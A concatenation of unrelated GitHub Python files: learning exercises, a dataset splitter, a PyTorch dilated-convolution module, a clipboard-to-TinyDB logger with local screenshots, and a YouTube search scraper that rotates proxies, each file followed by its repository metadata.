materialized by reference. Please pass " "full specification for the MultiTypeComponent." ) spec = dict(spec) component_cls = cls._get_type(spec.pop('type'), spec) return component_cls(**spec) def to_spec(self, context: Dict[str, Any] | None = None) -> Dict[str, Any]: """ Exports the full specification to reconstruct this component. Returns ------- Resolved and instantiated Component object """ spec = super().to_spec(context=context) spec['type'] = self._component_type return spec @classmethod def validate( cls, spec: Dict[str, Any] | str, context: Dict[str, Any] | None = None ) -> Dict[str, Any] | str: """ Validates the component specification given the validation context and the path. Arguments ----------- spec: dict | str The specification for the component being validated or a reference to the component. context: dict Validation context contains the specification of all previously validated components, e.g. to allow resolving of references. Returns -------- Validated specification. """ if isinstance(spec, str): return spec context = {} if context is None else context if 'type' not in spec: msg = f'{cls.__name__} component specification did not declare a type.' msg, attr = reverse_match_suggestion('type', list(spec), msg) raise ValidationError(msg, spec, attr) component_cls = cls._get_type(spec['type'], spec) component_cls._validate_keys_(spec) component_cls._validate_required_(spec) return component_cls._validate_spec_(spec, context) _hash_funcs[Component] = lambda component: _container_hash(component.to_spec())
holoviz/lumen
lumen/base.py
base.py
py
22,041
python
en
code
149
github-code
6
72960115387
"""def reverse(a): while a: #for i in a: if a != " ": b = a[::-1] print("Reversed string is: ", b) if b == a: print("Works") else: print("Bummer!") return reverse("roor")""" """prefixes = 'JKLMNOPQ' suffix = 'ack' #i = 0 for letter in prefixes: if letter == 'O': letter = letter + 'u' print(letter + suffix) elif letter == 'Q': letter = letter + 'u' print(letter + suffix) else: print(letter + suffix) #i = i + 1 """ """a = "fruit" print(a[:])""" def find(word, letter, index): #index = 0 while index < len(word): if word[index] == letter: return index index = index + 1 return -1 print(find("aderinsola", "a", 0)) """def count(word, letter): count = 0 a = [] b = 0 for a in word: if letter == a[b]: count = count + 1 print(count, end="") count("abracadabra", "a")""" """def count(word, letter): count = 0 a = [] b = 0 #c = b for a in word: if letter == a[b]: count = count + 1 print(count, end="") count("abracadabra", "a")""" """def count(word, letter): count = 0 a = [] b = 0 #c = 0 #while c <= b: #while word != " ": # c = 0 for a in word: if letter == a[b]: count = count + 1 #c = c + 1 print(count, end="") #c = c + 1 count("abracadabra", "a")""" """a = "rood" b = [] while a: c = 0 for i in a: if a != " ": b = a[::-1] print(b, end="") break c = c + 1""" #print(a) #b = a[::-1] #print(b) """if b == a: print("Works!") else: print("Ouch! That sucks!")""" """def any_lowercase(s): for c in s: if c.islower(): #b = c return True #if lowercase in the middle, this doesn't else: #perform as it should return False def any_lowercase2(s): for c in s: if 'c'.islower(): return 'True' else: return 'False' def any_lowercase3(s): for c in s: flag = c.islower() return flag def any_lowercase4(s): flag = False for c in s: flag = flag or c.islower() return flag def any_lowercase5(s): for c in s: if not c.islower(): return False #This works well! return True #print(any_lowercase2("ADERINSOLA")) def rotate_word(s, i): holder = "" for v in s: c = ord(v) if c >= ord('a') and c <= ord('z'): if c > ord('m'): c -= i else: c += i elif c >= ord('A') and c <= ord('Z'): if c > ord ('M'): c -= i else: c += i holder += chr(c) return holder print(rotate_word("The Quick Brown Fox Jumps Over The Lazy Dog", 13))"""
derinsola01/Projects
chapter8codes.py
chapter8codes.py
py
2,589
python
en
code
0
github-code
6
17334218878
#!/usr/bin/python # -*- coding: UTF-8 -*- import re,os,sys import random import argparse parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--per', dest='per', type=int, default=10, help='ratio of test set (%)') parser.add_argument('--file', dest='file', type=str, default='data_from_USPTO_utf8_converted_clear', help='input file') args = parser.parse_args() params = vars(args) print(params) file = params['file'] test_percent = params['per'] # select n% as test set def select_file(fin,test_p): lines = open(fin,'r+').readlines()[1:] #remove the first title line and the last blank line writer1= open(fin+'_train', 'w') writer2= open(fin+'_test', 'w') all_num = len(lines) test_num = int(all_num*(test_p*0.01)) print('all num: %d' %all_num) print('test num: %d' %test_num) print('train num: %d' %(all_num-test_num)) print('slecting...') test_set = random.sample(lines, test_num) for item in test_set: lines.remove(item) print('selected') writer1.writelines(lines) writer2.writelines(test_set) select_file(file, test_percent)
jshmjs45/data_for_chem
codes/select_file.py
select_file.py
py
1,111
python
en
code
13
github-code
6
38153977020
#if an element in an m x n matrix is 0, it's entire #row and column are set to zero #O(m*n) solution: loops through matrix twice, #first time to find the rows and columns with zeros #in them, and second time to assign each value in those #rows cols to zero def zero_matrix(m): row = {} col = {} for i in range(len(m)): for j in range(len(m[0])): if(m[i][j] == 0): if(i not in row): row[i] = 1 if(j not in col): col[j] = 1 #set all vals in row to zero for i in row: for j in range(len(m[0])): m[i][j] = 0 #set all vals in col to zero for j in col: for i in range(len(m)): m[i][j] = 0 return(m) m = [[1,0,1,1],[1,1,1,1],[0,1,1,0],[1,1,1,1]] print(zero_matrix(m))
BlakeMcMurray/Coding-Problem-Solutions
Arrays/zeroMatrix.py
zeroMatrix.py
py
842
python
en
code
0
github-code
6
37616127622
import time import os from richxerox import * from tinydb import TinyDB, where HOME_DIR = 'static/db' # Create directory if it doesn't exist os.system("mkdir %s" % HOME_DIR) db = TinyDB('%s/db.json' % HOME_DIR) currently_found_in_clipboard = paste(format='text') while True: time.sleep(0.1) # one tenth of a second if paste(format='text') != currently_found_in_clipboard: currently_found_in_clipboard = paste(format='text') # When the user hits CMD+C store the clipboard in a file and take a screenshot of the screen created_at = time.time() entry = { 'content': pasteall(), 'created_at': int(created_at),} entry['screenshot'] = '%s/screen%s.png' % (HOME_DIR, created_at) os.system("screencapture %s" % entry['screenshot']) db.insert(entry)
pantacuzino/personalkb
script.py
script.py
py
807
python
en
code
0
github-code
6
71520783227
import torch import torch.nn as nn import torch.nn.functional as F import numpy as np import math from detectron2.detectron2.layers import FrozenBatchNorm2d, ShapeSpec, get_norm _NORM = 'BN' class Conv2d_BN(nn.Module): """Convolution with BN module.""" def __init__( self, in_ch, out_ch, kernel_size=1, stride=1, pad=0, dilation=1, groups=1, bn_weight_init=1, act_layer=None, ): super().__init__() self.in_ch = in_ch self.out_ch = out_ch self.conv = torch.nn.Conv2d(in_ch, out_ch, kernel_size, stride, pad, dilation, groups, bias=False ) self.bn = get_norm(_NORM, out_ch) torch.nn.init.constant_(self.bn.weight, bn_weight_init) torch.nn.init.constant_(self.bn.bias, 0) for m in self.modules(): if isinstance(m, nn.Conv2d): # Note that there is no bias due to BN fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels m.weight.data.normal_(mean=0.0, std=np.sqrt(2.0 / fan_out)) self.act_layer = act_layer() if act_layer is not None else nn.Identity() def forward(self, x): # ain = self.in_ch # aout = self.out_ch x = self.conv(x) x = self.bn(x) x = self.act_layer(x) return x class Dila_PRM(nn.Module): def __init__(self,in_embed,out_embed,kernel_size=4,downsample_ratio=1,dilations=[2,4,6], fusion='cat'): super().__init__() self.dilations = dilations self.in_embed = in_embed # self.in_embeds=[self.in_embed,self.in_embed//2,self.in_embed//4] # self.out_embeds=[self.in_embed,self.in_embed//2,self.in_embed//4] self.out_embed = out_embed self.fusion = fusion self.kernel_size = kernel_size self.stride = downsample_ratio #self.out_size = img_size//downsample_ratio self.convs = nn.ModuleList( [ nn.Sequential( nn.Conv2d( in_channels=self.in_embed, out_channels=self.in_embed, kernel_size=self.kernel_size, stride=self.stride, # padding=math.ceil(((self.kernel_size-1)*self.dilations[idx] + 1 - self.stride) / 2), padding=math.ceil(((self.kernel_size-1)*self.dilations[idx])/2), dilation=self.dilations[idx]), # nn.BatchNorm2d(self.in_embed), nn.GELU() ) for idx in range(len(self.dilations)) ] ) if self.fusion == 'cat': self.outchans = self.in_embed * len(self.dilations) '''这里可以改一改,不同尺度的特征维度尽量少''' #self.aggerate = Conv2d_BN(self.in_embed*len(self.dilations),self.in_embed,act_layer=nn.Hardswish) self.aggerate = Conv2d_BN(self.in_embed*len(self.dilations),self.out_embed,act_layer=nn.Hardswish) def forward(self,x): B,C,H,W = x.shape #1,3,320,320 out = self.convs[0](x).unsqueeze(dim=-1) for i in range(1,len(self.dilations)): cur_out = self.convs[i](x).unsqueeze(dim=-1) out = torch.cat((cur_out,out),dim=-1) B, C, W, H, N = out.shape #cur_size = (W,H) if self.fusion=='cat': out = out.permute(0,4,1,2,3).reshape(B,N*C,W,H) out = self.aggerate(out) # out = out.flatten(2).transpose(1,2) #B,N,C return out
LiaoYun0x0/BiFormer
models/dila_prm.py
dila_prm.py
py
4,008
python
en
code
0
github-code
6
40467207556
def solution(box): maxBox = max(box) if maxBox == box[0]: return box[0] start, end = 0, maxBox answer = maxBox while start <= end: mid = (start + end) // 2 crit = 0 for b in box: crit += b - mid if crit > 0: start = mid + 1 break if crit <= 0: # end = mid - 1 answer = min(answer, mid) else: start = mid + 1 return answer print(solution([500, 999, 400]))
Cho-El/coding-test-practice
프로그래머스 문제/파이썬/2022 카카오 채용연계형 겨울 테크 인턴십 코딩테스트/3.py
3.py
py
552
python
en
code
0
github-code
6
30375207065
from random import randint de = randint(1,6) print(de) secret = randint(0,1000) for essai in range(10): print("Devinez mon nombre secret :") nombreSaisi = int(input()) if nombreSaisi == secret: print("Bravo, vous êtes perspicace.") break else: print("Et non, bien tenté.")
vguisse/job
2nde/algo/entree_test/ex4.py
ex4.py
py
318
python
fr
code
0
github-code
6
8772037717
import requests,re,threading,os, sys,random,copy,random,json,httpx,hashlib from loguru import logger from wmi import WMI from urllib.request import urlopen from time import sleep from colorama import init, Fore, Style from urllib.parse import urlencode from typing import Union, List __version__ = "2-5" HWID = WMI().Win32_ComputerSystemProduct()[0].UUID CLIENTS = { "MWEB": { 'context': { 'client': { 'clientName': 'MWEB', 'clientVersion': '2.20211109.01.00' } }, 'api_key': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8' }, "ANDROID": { 'context': { 'client': { 'clientName': 'ANDROID', 'clientVersion': '16.20' } }, 'api_key': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8' }, "ANDROID_EMBED": { 'context': { 'client': { 'clientName': 'ANDROID', 'clientVersion': '16.20', 'clientScreen': 'EMBED' } }, 'api_key': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8' }, "TV_EMBED": { "context": { "client": { "clientName": "TVHTML5_SIMPLY_EMBEDDED_PLAYER", "clientVersion": "2.0" }, "thirdParty": { "embedUrl": "https://www.youtube.com/", } }, 'api_key': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8' } } requestPayload = { "context": { "client": { "clientName": "WEB", "clientVersion": "2.20210224.06.00", "newVisitorCookie": True, }, "user": { "lockedSafetyMode": False, } } } userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' searchKey = 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8' videoElementKey = 'videoRenderer' channelElementKey = 'channelRenderer' playlistElementKey = 'playlistRenderer' shelfElementKey = 'shelfRenderer' itemSectionKey = 'itemSectionRenderer' continuationItemKey = 'continuationItemRenderer' richItemKey = 'richItemRenderer' hashtagVideosPath = ['contents', 'twoColumnBrowseResultsRenderer', 'tabs', 0, 'tabRenderer', 'content', 'richGridRenderer', 'contents'] hashtagContinuationVideosPath = ['onResponseReceivedActions', 0, 'appendContinuationItemsAction', 'continuationItems'] contentPath = ['contents', 'twoColumnSearchResultsRenderer', 'primaryContents', 'sectionListRenderer', 'contents'] fallbackContentPath = ['contents', 'twoColumnSearchResultsRenderer', 'primaryContents', 'richGridRenderer', 'contents'] continuationContentPath = ['onResponseReceivedCommands', 0, 'appendContinuationItemsAction', 'continuationItems'] continuationKeyPath = ['continuationItemRenderer', 'continuationEndpoint', 'continuationCommand', 'token'] def getValue(source: dict, path: List[str]) -> Union[str, int, dict, None]: value = source for key in path: if type(key) is str: if key in value.keys(): value = value[key] else: value = None break elif type(key) is int: if len(value) != 0: value = value[key] else: value = None break return value def getVideoId(videoLink: str) -> str: if 'youtu.be' in videoLink: if videoLink[-1] == '/': return videoLink.split('/')[-2] return videoLink.split('/')[-1] elif 'youtube.com' in videoLink: if '&' not in videoLink: return videoLink[videoLink.index('v=') + 2:] return videoLink[videoLink.index('v=') + 2: videoLink.index('&')] else: return videoLink class ComponentHandler: def _getVideoComponent(self, element: dict, shelfTitle: str = None) -> dict: video = element[videoElementKey] component = { 'type': 'video', 'id': self._getValue(video, ['videoId']), 'title': self._getValue(video, ['title', 'runs', 0, 'text']), 'publishedTime': self._getValue(video, ['publishedTimeText', 'simpleText']), 'duration': self._getValue(video, ['lengthText', 'simpleText']), 'viewCount': { 'text': self._getValue(video, ['viewCountText', 'simpleText']), 'short': self._getValue(video, ['shortViewCountText', 'simpleText']), }, 'thumbnails': self._getValue(video, ['thumbnail', 'thumbnails']), 'richThumbnail': self._getValue(video, ['richThumbnail', 'movingThumbnailRenderer', 'movingThumbnailDetails', 'thumbnails', 0]), 'descriptionSnippet': self._getValue(video, ['detailedMetadataSnippets', 0, 'snippetText', 'runs']), 'channel': { 'name': self._getValue(video, ['ownerText', 'runs', 0, 'text']), 'id': self._getValue(video, ['ownerText', 'runs', 0, 'navigationEndpoint', 'browseEndpoint', 'browseId']), 'thumbnails': self._getValue(video, ['channelThumbnailSupportedRenderers', 'channelThumbnailWithLinkRenderer', 'thumbnail', 'thumbnails']), }, 'accessibility': { 'title': self._getValue(video, ['title', 'accessibility', 'accessibilityData', 'label']), 'duration': self._getValue(video, ['lengthText', 'accessibility', 'accessibilityData', 'label']), }, } component['link'] = 'https://www.youtube.com/watch?v=' + component['id'] component['channel']['link'] = 'https://www.youtube.com/channel/' + component['channel']['id'] component['shelfTitle'] = shelfTitle return component def _getChannelComponent(self, element: dict) -> dict: channel = element[channelElementKey] component = { 'type': 'channel', 'id': self._getValue(channel, ['channelId']), 'title': self._getValue(channel, ['title', 'simpleText']), 'thumbnails': self._getValue(channel, ['thumbnail', 'thumbnails']), 'videoCount': self._getValue(channel, ['videoCountText', 'runs', 0, 'text']), 'descriptionSnippet': self._getValue(channel, ['descriptionSnippet', 'runs']), 'subscribers': self._getValue(channel, ['subscriberCountText', 'simpleText']), } component['link'] = 'https://www.youtube.com/channel/' + component['id'] return component def _getVideoFromChannelSearch(self, elements: list) -> list: channelsearch = [] for element in elements: element = self._getValue(element, ["childVideoRenderer"]) json = { "id": self._getValue(element, ["videoId"]), "title": self._getValue(element, ["title", "simpleText"]), "uri": self._getValue(element, ["navigationEndpoint", "commandMetadata", "webCommandMetadata", "url"]), "duration": { "simpleText": self._getValue(element, ["lengthText", "simpleText"]), "text": self._getValue(element, ["lengthText", "accessibility", "accessibilityData", "label"]) } } channelsearch.append(json) return channelsearch def _getChannelSearchComponent(self, elements: list) -> list: channelsearch = [] for element in elements: responsetype = None if 'gridPlaylistRenderer' in element: element = element['gridPlaylistRenderer'] responsetype = 'gridplaylist' elif 'itemSectionRenderer' in element: first_content = element["itemSectionRenderer"]["contents"][0] if 'videoRenderer' in first_content: element = first_content['videoRenderer'] responsetype = "video" elif 'playlistRenderer' in first_content: element = first_content["playlistRenderer"] responsetype = "playlist" else: raise Exception(f'Unexpected first_content {first_content}') elif 'continuationItemRenderer' in element: # for endless scrolling, not needed here # TODO: Implement endless scrolling continue else: raise Exception(f'Unexpected element {element}') if responsetype == "video": json = { "id": self._getValue(element, ["videoId"]), "thumbnails": { "normal": self._getValue(element, ["thumbnail", "thumbnails"]), "rich": self._getValue(element, ["richThumbnail", "movingThumbnailRenderer", "movingThumbnailDetails", "thumbnails"]) }, "title": self._getValue(element, ["title", "runs", 0, "text"]), "descriptionSnippet": self._getValue(element, ["descriptionSnippet", "runs", 0, "text"]), "uri": self._getValue(element, ["navigationEndpoint", "commandMetadata", "webCommandMetadata", "url"]), "views": { "precise": self._getValue(element, ["viewCountText", "simpleText"]), "simple": self._getValue(element, ["shortViewCountText", "simpleText"]), "approximate": self._getValue(element, ["shortViewCountText", "accessibility", "accessibilityData", "label"]) }, "duration": { "simpleText": self._getValue(element, ["lengthText", "simpleText"]), "text": self._getValue(element, ["lengthText", "accessibility", "accessibilityData", "label"]) }, "published": self._getValue(element, ["publishedTimeText", "simpleText"]), "channel": { "name": self._getValue(element, ["ownerText", "runs", 0, "text"]), "thumbnails": self._getValue(element, ["channelThumbnailSupportedRenderers", "channelThumbnailWithLinkRenderer", "thumbnail", "thumbnails"]) }, "type": responsetype } elif responsetype == 'playlist': json = { "id": self._getValue(element, ["playlistId"]), "videos": self._getVideoFromChannelSearch(self._getValue(element, ["videos"])), "thumbnails": { "normal": self._getValue(element, ["thumbnails"]), }, "title": self._getValue(element, ["title", "simpleText"]), "uri": self._getValue(element, ["navigationEndpoint", "commandMetadata", "webCommandMetadata", "url"]), "channel": { "name": self._getValue(element, ["longBylineText", "runs", 0, "text"]), }, "type": responsetype } else: json = { "id": self._getValue(element, ["playlistId"]), "thumbnails": { "normal": self._getValue(element, ["thumbnail", "thumbnails", 0]), }, "title": self._getValue(element, ["title", "runs", 0, "text"]), "uri": self._getValue(element, ["navigationEndpoint", "commandMetadata", "webCommandMetadata", "url"]), "type": 'playlist' } channelsearch.append(json) return channelsearch def _getShelfComponent(self, element: dict) -> dict: shelf = element[shelfElementKey] return { 'title': self._getValue(shelf, ['title', 'simpleText']), 'elements': self._getValue(shelf, ['content', 'verticalListRenderer', 'items']), } def _getValue(self, source: dict, path: List[str]) -> Union[str, int, dict, None]: value = source for key in path: if type(key) is str: if key in value.keys(): value = value[key] else: value = None break elif type(key) is int: if len(value) != 0: value = value[key] else: value = None break return value class RequestHandler(ComponentHandler): def _makeRequest(self) -> None: ''' Fixes #47 ''' requestBody = copy.deepcopy(requestPayload) requestBody['query'] = self.query requestBody['client'] = { 'hl': self.language, 'gl': self.region, } if self.searchPreferences: requestBody['params'] = self.searchPreferences if self.continuationKey: requestBody['continuation'] = self.continuationKey requestBodyBytes = json.dumps(requestBody).encode('utf_8') request = Request( 'https://www.youtube.com/youtubei/v1/search' + '?' + urlencode({ 'key': searchKey, }), data = requestBodyBytes, headers = { 'Content-Type': 'application/json; charset=utf-8', 'Content-Length': len(requestBodyBytes), 'User-Agent': userAgent, } ) try: self.response = urlopen(request, timeout=self.timeout).read().decode('utf_8') except (Exception,): return self._makeRequest() def _parseSource(self) -> None: try: if not self.continuationKey: responseContent = self._getValue(json.loads(self.response), contentPath) else: responseContent = self._getValue(json.loads(self.response), continuationContentPath) if responseContent: for element in responseContent: if itemSectionKey in element.keys(): self.responseSource = self._getValue(element, [itemSectionKey, 'contents']) if continuationItemKey in element.keys(): self.continuationKey = self._getValue(element, continuationKeyPath) else: self.responseSource = self._getValue(json.loads(self.response), fallbackContentPath) self.continuationKey = self._getValue(self.responseSource[-1], continuationKeyPath) except: raise Exception('ERROR: Could not parse YouTube response.') class RequestCore: def __init__(self): self.url = None self.data = None self.timeout = 2 self.proxy = [] proxy = open("proxy.txt", "r").read().splitlines() for p in proxy: p_split = p.split(':') if len(p_split) == 2:#ip:port self.proxy.append({"http://": "http://"+p}) elif len(p_split) == 4:#ip:port:login:password self.proxy.append({"http://": f"http://{p_split[2]}:{p_split[3]}@{p_split[0]}:{p_split[1]}"}) elif '@' in p:#login:password@ip:port self.proxy.append({"http://": "http://"+p}) def syncPostRequest(self) -> httpx.Response: try: r = httpx.post( self.url, headers={"User-Agent": userAgent}, json=self.data, timeout=self.timeout, proxies=random.choice(self.proxy) ) if r.status_code == 200: return r else: return self.syncPostRequest() except (Exception,): return self.syncPostRequest() async def asyncPostRequest(self) -> httpx.Response: try: async with httpx.AsyncClient(proxies=random.choice(self.proxy)) as client: r = await client.post(self.url, headers={"User-Agent": userAgent}, json=self.data, timeout=self.timeout) if r.status_code == 200: return r else: return self.asyncPostRequest() except (Exception,): return await self.asyncPostRequest() def syncGetRequest(self) -> httpx.Response: try: r = httpx.get(self.url, headers={"User-Agent": userAgent}, timeout=self.timeout, cookies={'CONSENT': 'YES+1'}, proxies=random.choice(self.proxy)) if r.status_code == 200: return r else: return self.syncGetRequest() except (Exception,): return self.syncGetRequest() async def asyncGetRequest(self) -> httpx.Response: try: async with httpx.AsyncClient(proxies=random.choice(self.proxy)) as client: r = await client.get(self.url, headers={"User-Agent": userAgent}, timeout=self.timeout, cookies={'CONSENT': 'YES+1'}) if r.status_code == 200: return r else: return await self.asyncGetRequest() except (Exception,): return await self.asyncGetRequest() class VideoCore(RequestCore): def __init__(self, videoLink: str, componentMode: str, resultMode: int, timeout: int, enableHTML: bool, overridedClient: str = "ANDROID"): super().__init__() self.timeout = timeout self.resultMode = resultMode self.componentMode = componentMode self.videoLink = videoLink self.enableHTML = enableHTML self.overridedClient = overridedClient # We call this when we use only HTML def post_request_only_html_processing(self): self.__getVideoComponent(self.componentMode) self.result = self.__videoComponent def post_request_processing(self): self.__parseSource() self.__getVideoComponent(self.componentMode) self.result = self.__videoComponent def prepare_innertube_request(self): self.url = 'https://www.youtube.com/youtubei/v1/player' + "?" + urlencode({ 'key': searchKey, 'contentCheckOk': True, 'racyCheckOk': True, "videoId": getVideoId(self.videoLink) }) self.data = copy.deepcopy(CLIENTS[self.overridedClient]) async def async_create(self): self.prepare_innertube_request() response = await self.asyncPostRequest() self.response = response.text if response.status_code == 200: self.post_request_processing() else: raise Exception('ERROR: Invalid status code.') def sync_create(self): self.prepare_innertube_request() response = self.syncPostRequest() self.response = response.text if response.status_code == 200: self.post_request_processing() else: raise Exception('ERROR: Invalid status code.') def prepare_html_request(self): self.url = 'https://www.youtube.com/youtubei/v1/player' + "?" + urlencode({ 'key': searchKey, 'contentCheckOk': True, 'racyCheckOk': True, "videoId": getVideoId(self.videoLink) }) self.data = CLIENTS["MWEB"] def sync_html_create(self): self.prepare_html_request() response = self.syncPostRequest() self.HTMLresponseSource = response.json() async def async_html_create(self): self.prepare_html_request() response = await self.asyncPostRequest() self.HTMLresponseSource = response.json() def __parseSource(self) -> None: try: self.responseSource = json.loads(self.response) except Exception as e: raise Exception('ERROR: Could not parse YouTube response.') def __result(self, mode: int) -> Union[dict, str]: if mode == ResultMode.dict: return self.__videoComponent elif mode == ResultMode.json: return json.dumps(self.__videoComponent, indent=4) def __getVideoComponent(self, mode: str) -> None: videoComponent = {} if mode in ['getInfo', None]: try: responseSource = self.responseSource except: responseSource = None if self.enableHTML: responseSource = self.HTMLresponseSource component = { 'id': getValue(responseSource, ['videoDetails', 'videoId']), 'title': getValue(responseSource, ['videoDetails', 'title']), 'duration': { 'secondsText': getValue(responseSource, ['videoDetails', 'lengthSeconds']), }, 'viewCount': { 'text': getValue(responseSource, ['videoDetails', 'viewCount']) }, 'thumbnails': getValue(responseSource, ['videoDetails', 'thumbnail', 'thumbnails']), 'description': getValue(responseSource, ['videoDetails', 'shortDescription']), 'channel': { 'name': getValue(responseSource, ['videoDetails', 'author']), 'id': getValue(responseSource, ['videoDetails', 'channelId']), }, 'allowRatings': getValue(responseSource, ['videoDetails', 'allowRatings']), 'averageRating': getValue(responseSource, ['videoDetails', 'averageRating']), 'keywords': getValue(responseSource, ['videoDetails', 'keywords']), 'isLiveContent': getValue(responseSource, ['videoDetails', 'isLiveContent']), 'publishDate': getValue(responseSource, ['microformat', 'playerMicroformatRenderer', 'publishDate']), 'uploadDate': getValue(responseSource, ['microformat', 'playerMicroformatRenderer', 'uploadDate']), 'isFamilySafe': getValue(responseSource, ['microformat', 'playerMicroformatRenderer', 'isFamilySafe']), 'category': getValue(responseSource, ['microformat', 'playerMicroformatRenderer', 'category']), } component['isLiveNow'] = component['isLiveContent'] and component['duration']['secondsText'] == "0" component['link'] = 'https://www.youtube.com/watch?v=' + component['id'] component['channel']['link'] = 'https://www.youtube.com/channel/' + component['channel']['id'] videoComponent.update(component) if mode in ['getFormats', None]: videoComponent.update( { "streamingData": getValue(self.responseSource, ["streamingData"]) } ) if self.enableHTML: videoComponent["publishDate"] = getValue(self.HTMLresponseSource, ['microformat', 'playerMicroformatRenderer', 'publishDate']) videoComponent["uploadDate"] = getValue(self.HTMLresponseSource, ['microformat', 'playerMicroformatRenderer', 'uploadDate']) self.__videoComponent = videoComponent class ResultMode: json = 0 dict = 1 class SearchMode: videos = 'EgIQAQ%3D%3D' channels = 'EgIQAg%3D%3D' playlists = 'EgIQAw%3D%3D' livestreams = 'EgJAAQ%3D%3D' class Video: @staticmethod def get(videoLink: str, mode: int = ResultMode.dict, timeout: int = None, get_upload_date: bool = False) -> Union[ dict, str, None]: vc = VideoCore(videoLink, None, mode, timeout, get_upload_date) if get_upload_date: vc.sync_html_create() vc.sync_create() return vc.result class ChannelSearchCore(RequestCore, ComponentHandler): response = None responseSource = None resultComponents = [] def __init__(self, query: str, language: str, region: str, searchPreferences: str, browseId: str, timeout: int): super().__init__() self.query = query self.language = language self.region = region self.browseId = browseId self.searchPreferences = searchPreferences self.continuationKey = None self.timeout = timeout def sync_create(self): self._syncRequest() self._parseChannelSearchSource() self.response = self._getChannelSearchComponent(self.response) async def next(self): await self._asyncRequest() self._parseChannelSearchSource() self.response = self._getChannelSearchComponent(self.response) return self.response def _parseChannelSearchSource(self) -> None: try: last_tab = self.response["contents"]["twoColumnBrowseResultsRenderer"]["tabs"][-1] if 'expandableTabRenderer' in last_tab: self.response = last_tab["expandableTabRenderer"]["content"]["sectionListRenderer"]["contents"] else: tab_renderer = last_tab["tabRenderer"] if 'content' in tab_renderer: self.response = tab_renderer["content"]["sectionListRenderer"]["contents"] else: self.response = [] except: raise Exception('ERROR: Could not parse YouTube response.') def _getRequestBody(self): ''' Fixes #47 ''' requestBody = copy.deepcopy(requestPayload) requestBody['query'] = self.query requestBody['client'] = { 'hl': self.language, 'gl': self.region, } requestBody['params'] = self.searchPreferences requestBody['browseId'] = self.browseId self.url = 'https://www.youtube.com/youtubei/v1/browse' + '?' + urlencode({ 'key': searchKey, }) self.data = requestBody def _syncRequest(self) -> None: ''' Fixes #47 ''' self._getRequestBody() request = self.syncPostRequest() try: self.response = request.json() except: raise Exception('ERROR: Could not make request.') async def _asyncRequest(self) -> None: ''' Fixes #47 ''' self._getRequestBody() request = await self.asyncPostRequest() try: self.response = request.json() except: raise Exception('ERROR: Could not make request.') def result(self, mode: int = ResultMode.dict) -> Union[str, dict]: '''Returns the search result. Args: mode (int, optional): Sets the type of result. Defaults to ResultMode.dict. Returns: Union[str, dict]: Returns JSON or dictionary. ''' if mode == ResultMode.json: return json.dumps({'result': self.response}, indent=4) elif mode == ResultMode.dict: return {'result': self.response} class SearchCore(RequestCore, RequestHandler, ComponentHandler): response = None responseSource = None resultComponents = [] def __init__(self, query: str, limit: int, language: str, region: str, searchPreferences: str, timeout: int): super().__init__() self.query = query self.limit = limit self.language = language self.region = region self.searchPreferences = searchPreferences self.timeout = timeout self.continuationKey = None def sync_create(self): self._makeRequest() self._parseSource() def _getRequestBody(self): ''' Fixes #47 ''' requestBody = copy.deepcopy(requestPayload) requestBody['query'] = self.query requestBody['client'] = { 'hl': self.language, 'gl': self.region, } if self.searchPreferences: requestBody['params'] = self.searchPreferences if self.continuationKey: requestBody['continuation'] = self.continuationKey self.url = 'https://www.youtube.com/youtubei/v1/search' + '?' + urlencode({ 'key': searchKey, }) self.data = requestBody def _makeRequest(self) -> None: self._getRequestBody() request = self.syncPostRequest() try: self.response = request.text except: raise Exception('ERROR: Could not make request.') async def _makeAsyncRequest(self) -> None: self._getRequestBody() request = await self.asyncPostRequest() try: self.response = request.text except: raise Exception('ERROR: Could not make request.') def result(self, mode: int = ResultMode.dict) -> Union[str, dict]: if mode == ResultMode.json: return json.dumps({'result': self.resultComponents}, indent=4) elif mode == ResultMode.dict: return {'result': self.resultComponents} def _next(self) -> bool: if self.continuationKey: self.response = None self.responseSource = None self.resultComponents = [] self._makeRequest() self._parseSource() self._getComponents(*self.searchMode) return True else: return False async def _nextAsync(self) -> dict: self.response = None self.responseSource = None self.resultComponents = [] await self._makeAsyncRequest() self._parseSource() self._getComponents(*self.searchMode) return { 'result': self.resultComponents, } def _getComponents(self, findVideos: bool, findChannels: bool, findPlaylists: bool) -> None: self.resultComponents = [] for element in self.responseSource: if videoElementKey in element.keys() and findVideos: self.resultComponents.append(self._getVideoComponent(element)) if channelElementKey in element.keys() and findChannels: self.resultComponents.append(self._getChannelComponent(element)) if shelfElementKey in element.keys() and findVideos: for shelfElement in self._getShelfComponent(element)['elements']: self.resultComponents.append( self._getVideoComponent(shelfElement, shelfTitle=self._getShelfComponent(element)['title'])) if richItemKey in element.keys() and findVideos: richItemElement = self._getValue(element, [richItemKey, 'content']) if videoElementKey in richItemElement.keys(): videoComponent = self._getVideoComponent(richItemElement) self.resultComponents.append(videoComponent) if len(self.resultComponents) >= self.limit: break class Search(SearchCore): def __init__(self, query: str, limit: int = 20, language: str = 'en', region: str = 'US', timeout: int = None): self.searchMode = (True, True, True) super().__init__(query, limit, language, region, None, timeout) self.sync_create() self._getComponents(*self.searchMode) def next(self) -> bool: return self._next() class VideosSearch(SearchCore): def __init__(self, query: str, limit: int, language: str = 'en', region: str = 'US', timeout: int = None): self.searchMode = (True, False, False) super().__init__(query, limit, language, region, SearchMode.videos, timeout) self.sync_create() self._getComponents(*self.searchMode) def next(self) -> bool: return self._next() class ChannelSearch(ChannelSearchCore): def __init__(self, query: str, browseId: str, language: str = 'en', region: str = 'US', searchPreferences: str = "EgZzZWFyY2g%3D", timeout: int = None): super().__init__(query, language, region, searchPreferences, browseId, timeout) self.sync_create() class CustomSearch(SearchCore): def __init__(self, query: str, searchPreferences: str, limit: int = 20, language: str = 'en', region: str = 'US', timeout: int = None): self.searchMode = (True, True, True) super().__init__(query, limit, language, region, searchPreferences, timeout) self.sync_create() self._getComponents(*self.searchMode) def next(self): self._next() init() logger.remove() # Удаляем стандартный обработчик 